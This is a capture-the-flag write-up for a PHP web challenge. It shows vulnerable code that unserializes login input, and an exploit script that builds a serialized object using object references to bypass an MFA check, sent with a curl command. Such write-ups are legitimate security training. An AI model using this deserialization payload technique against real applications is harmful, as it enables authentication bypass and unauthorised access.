Corporate MFA [Web]

Corporate MFA

We've forgotten the password to our payroll machine. Can you extract it?


We are provided the source for a website.

In the source code we can see:

public function __construct($loginAttempt)
    $this->userData = unserialize($loginAttempt);
    if (!$this->userData)
        throw new InvalidArgumentException('Unable to reconstruct user data');

private function verifyUsername()
    return $this->userData->username === 'D0loresH4ze';

private function verifyPassword()
    return password_verify($this->userData->password, '$2y$07$BCryptRequires22Chrcte/VlQH0piJtjXl.0t1XkA8pw9dMXTpOq');

PHP object deserialization where username + password are checked against hardcoded credentials. Then there's the MFA which gets calculated on the fly but is still an object field and gets compared with another object field.


Can't really predict the MFA value, nor try to brute, but can use PHP object references instead and serialize that in since the serialization format allows it.

$x = array();

$x['username'] = "D0loresH4ze";
$x['password'] = 'rasmuslerdorf';
$x['_correctValue'] = 4;
$x['mfa'] = &$x['_correctValue'];

echo base64_encode(serialize((object)$x));


$ curl -s "$(php sploit.php)" \
| grep Congr | cut -d '>' -f2
Congratulations, your flag is: